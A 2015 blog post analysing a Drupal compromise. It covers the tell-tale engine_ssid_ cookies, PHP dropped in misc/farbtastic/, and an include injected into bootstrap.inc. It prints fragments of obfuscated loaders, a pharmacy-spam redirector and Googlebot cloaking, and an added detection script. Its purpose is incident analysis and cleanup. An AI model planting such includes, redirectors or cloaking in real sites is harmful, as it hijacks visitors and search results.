Drupal engine_ssid_ And engine_ssl_ cookies: You’ve Been Hacked

Mattias Geniar, Monday, March 9, 2015 - last modified: Monday, April 27, 2015

If you're seeing the cookies engine_ssid_ and engine_ssl_ being set in your Drupal site, chances are your Drupal installation has been hacked.

Detecting the hack

If you open your Inspector tab in Chrome/Firefox, you can see the following cookies set for your site.

[Image: drupal_engine_ssid_cookies]

The value of the engine_ssid_ cookie always has the form $randomstring_$timestamp, so every visitor gets a unique value. Here are the values I've seen in the wild:

  • ieuakakai_ 1430161738
  • idoaeodaeiiaeeu_ 1430161738

You're most likely finding these cookies because you're investigating a caching issue, where your cache hit-rates are dropping. The cause is this cookie: because it carries a unique timestamp for every visitor, it invalidates every cache.

Alternatively, you may have become aware of the hack because your SEO results have been altered. More on that near the middle of this post.

Finding the infected files on the filesystem

My investigations have, on numerous installations, always led to the directory misc/farbtastic/, where new PHP files were being dropped. Farbtastic is supposed to be a jQuery color picker, so you wouldn't expect PHP files in here -- right?

$ ls -alh misc/farbtastic/*.php
-rw-r--r-- 1 user group 100K misc/farbtastic/cache.php
-rw-r--r-- 1 user group 297  misc/farbtastic/leftpanelsin.php

The content of those files is what you would expect: typical obfuscated PHP code.

$ more misc/farbtastic/cache.php
<?php $GLOBALS['_1850119110_']=Array(base64_decode('ZXJyb3JfcmV' .'wb3J0a' .'W' .'5n'),base64_decode('c3' .'RyX3Jlc' .'Gx' .'hY2U='),base
...

This piece of PHP code can do harm in two ways: either it's included in the Drupal codebase, so it runs on every page load, or it's loaded by the browser as an AJAX request. This particular infection is the former: it gets included in the bootstrap of Drupal, so it's present on every request made to the server.

$ more includes/bootstrap.inc
...
/**
* First bootstrap phase: initialize configuration.
*/@include_once( DRUPAL_ROOT . '/misc/farbtastic/cache.php');
define('DRUPAL_BOOTSTRAP_CONFIGURATION', 0);

The Drupal bootstrap is what actually initialises the entire Drupal stack. By injecting it in there, this malware can be sure it's present on every PHP request processed by Drupal.

There should be actual bonus points awarded to this malware for adhering to the Drupal Coding Standards for its use of spaces and concatenation, although it's probably just a means for blending in better and staying hidden in the bootstrap file.

Update 12/3/2015, thanks to Dimitri in the comments.

There's also an infection in the includes/refresh.inc file, with more obfuscated code.

$ more includes/refresh.inc
...
$GLOBALS['_2008785826_']=Array(base64_decode('Z' .'XJ' .'yb' .'3' .'J' .'f' .'c' .'mVwb3J0' .'a' .'W5n'),base64_decode
...

What does the PHP code do?

Besides dropping in cookies that can mess with your caching strategy, this infection can do quite a bit more. After all, just busting caches everywhere may be fun, but that doesn't get you anywhere.

There are 2 parts to this infection. One is a simple redirector in the form of leftpanelsin.php, which I've prettified here.

$ more misc/farbtastic/leftpanelsin.php
<?php
if( $_REQUEST["q"] == "pharmacy") {
   header("Location: http://www.-removed-url-.com/?refid=xx&trackid=xx&q=". $_REQUEST["q"], true, 302);
}
else {
   header("Location: http://www.-removed-url-.com/catalog/Bestsellers/". $_REQUEST["q"] .".htm?refid=xx&trackid=xx&q=". $_REQUEST["q"], true, 302);
}
exit;
?>

The sole purpose of this file is to be called directly by the browser, most likely via an injected JavaScript <script> tag or an iframe. It redirects the visitor to an affiliate site.

The more complicated piece of code is the cache.php file. You can find the original cache.php version here.

[Embedded listing: Farbtastic Drupal Hack]

An attempt to deobfuscate the code can be found here.

[Embedded listing: Farbtastic Drupal Hack Deobfuscated]

In both cases, it's still entirely unreadable. Someone went to great lengths to hide the true purpose of this script. No simple deobfuscator can decode this; it would require a tremendous amount of work to get a readable version.

It is filled with $GLOBALS references, random function names, math, arrays, ... Honestly, that anything comes out of it at all is a victory on its own.

What does the code do with Drupal content?

The most visible difference is that it starts altering the SEO results of your website. It modifies the Description meta tag on the site.

[Image: drupal_hacked_seo_results]

If you browse the site normally, the engine_* cookies are set in your browser. If the Drupal hack code detects those cookies, it hides all evidence of the hack and considers you a "regular user".

However, if GoogleBot comes to browse the website, it advertises a drug store. And if you browse your own site with cookies stripped and the GoogleBot User-Agent, you'll see the malicious content.

$ curl http://www.domain.com/ -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

...

<div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even" property="content:encoded"><p>buy metformin generic <a href="/dapoxetine-online-uk">blog dapoxetine online uk</a> buy finpecia 5mg <a href="/buy-nolvadex-on-line">buy nolvadex on line</a>

Those links refer to a new page created by the malware, with more links to external drugstores. It's typical to see this page in the default Drupal layout, not the actual template used by the site.

[Image: drupal_hack_drugstore]

Clever little code.
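The checks above (foreign PHP in misc/farbtastic/, the include spliced into the bootstrap files, the base64-built $GLOBALS arrays, the engine_ss* cookie and the GoogleBot cloaking) can be run in one go. This is an added example, not code from the post or from Drupal core; the function names are its own, and the file paths and patterns are the ones described in the post.

```shell
#!/bin/sh
# Added example, not code from the post or from Drupal core. Paths and
# patterns come from the post; the function names are this example's own.

# Print every indicator found under the Drupal root "$1".
# Returns 0 when the tree looks clean, 1 when anything matched.
scan_drupal_root() {
    root=$1; found=0
    # 1. Farbtastic is a jQuery colour picker and ships no PHP, so any
    #    .php file under misc/farbtastic/ is foreign.
    for f in "$root"/misc/farbtastic/*.php; do
        [ -e "$f" ] || continue
        echo "dropped PHP file: $f"; found=1
    done
    # 2. The hook that runs the malware on every request: an include of
    #    misc/farbtastic/ spliced into a core bootstrap file.
    for inc in includes/bootstrap.inc includes/refresh.inc; do
        [ -f "$root/$inc" ] || continue
        if grep -n 'include_once.*farbtastic' "$root/$inc"; then
            echo "foreign include in $inc"; found=1
        fi
    done
    # 3. The obfuscation pattern shared by cache.php and refresh.inc:
    #    $GLOBALS['_<digits>_']=Array(base64_decode(...), ...)
    hits=$(grep -rlE '\$GLOBALS\[._[0-9]+_.\]=Array\(base64_decode' "$root" 2>/dev/null || true)
    if [ -n "$hits" ]; then
        echo "obfuscated GLOBALS array in:"; echo "$hits"; found=1
    fi
    return "$found"
}

# Fetch "$1" as a browser and as the Googlebot UA the post uses, and flag a
# differing body or an engine_ss* Set-Cookie header. A difference is a lead
# to inspect by hand, not proof; dynamic pages can differ for other reasons.
check_cloaking() {
    url=$1; bot='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
    rc=0
    if curl -sI -A 'Mozilla/5.0' "$url" | grep -qi '^set-cookie: engine_ss'; then
        echo "engine_ss* cookie set by $url"; rc=1
    fi
    if [ "$(curl -s -A 'Mozilla/5.0' "$url")" != "$(curl -s -A "$bot" "$url")" ]; then
        echo "body differs for Googlebot UA on $url"; rc=1
    fi
    return $rc
}

[ $# -gt 0 ] && scan_drupal_root "$1"
```

Run it as `sh scan.sh /var/www/drupal` for the filesystem scan, or source it and call `check_cloaking http://www.example.com/` against a site you operate; the scan only reads files and never modifies the installation.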

Finding The Source

How did it get there? Most likely an out-of-date plugin, or maybe Drupalgeddon. Judging by the timestamps of most of the infected files, this isn't a new breach, but it's something that appears to have been keeping quiet.

As far as I could tell, the only ways to spot it were the new cookies set on the site and the altered SEO results. No signs of abuse could be found anywhere in the access or mail logs.

Is this a botnet quietly starting to gain ground, or an old hack that just never got activated? I wish I could tell you, but I'm hoping for the latter.



Hi! My name is Mattias Geniar. I'm a Support Manager at Nucleus Hosting in Belgium, a general web geek, public speaker and podcaster. Currently working on DNS Spy. Follow me on Twitter as @mattiasgeniar.


Comments

Dimitri Steyaert Thursday, March 12, 2015 at 11:11

Your blogpost made my job easier today as I ran into this issue on a server of one of our customers.

In my case the file includes/refresh.inc (starting from the document root) contained the same-ish content as the cache.php. Did you notice the same?



    Mattias Geniar Thursday, March 12, 2015 at 11:36

    Correct, I somehow missed that file! I’ll update the blogpost with that info as well, thanks for letting me know!



Bastien Lamoureux Thursday, March 12, 2015 at 15:37

Found the same files on our own webserver, but not using Drupal. Using a Modx CMS.
How do you solve it? Just delete infected files?



    Mattias Geniar Thursday, March 12, 2015 at 18:20

    The safest bet would be to reinstall from scratch, install your plugins etc, import your database and test everything.

    Just removing the files probably isn’t a good idea, since the infection may be in _a lot_ of files, that are just very well hidden.



Mike Wednesday, March 25, 2015 at 22:43

Our website (still on Drupal 7.23) had those 2 additional PHP files in the Farbtastic folder + the additions in both .inc files as listed above.

It wasn’t manifesting itself as a problem that was viewable on our actual website, but, I think, it was causing random Viagra ads to show up on select mobile browsers on both Android and iOS. It wasn’t every page on the website – only certain pages, and a mix of pages that had been updated recently and others that hadn’t been touched in years.

It was also messing up our Google search results – a string of Viagra keywords would show up when Google’s bot crawled our site. This was confirmed by using Google’s “Fetch as Google” tool, which showed the additional Viagra nonsense on the page – even though it didn’t show up [in the source code or on the viewable page] on any desktop viewings of our website.

It seems like the problem is solved – i.e. when I “Fetch as Google” on our website now, the Viagra stuff is gone. Fingers crossed.
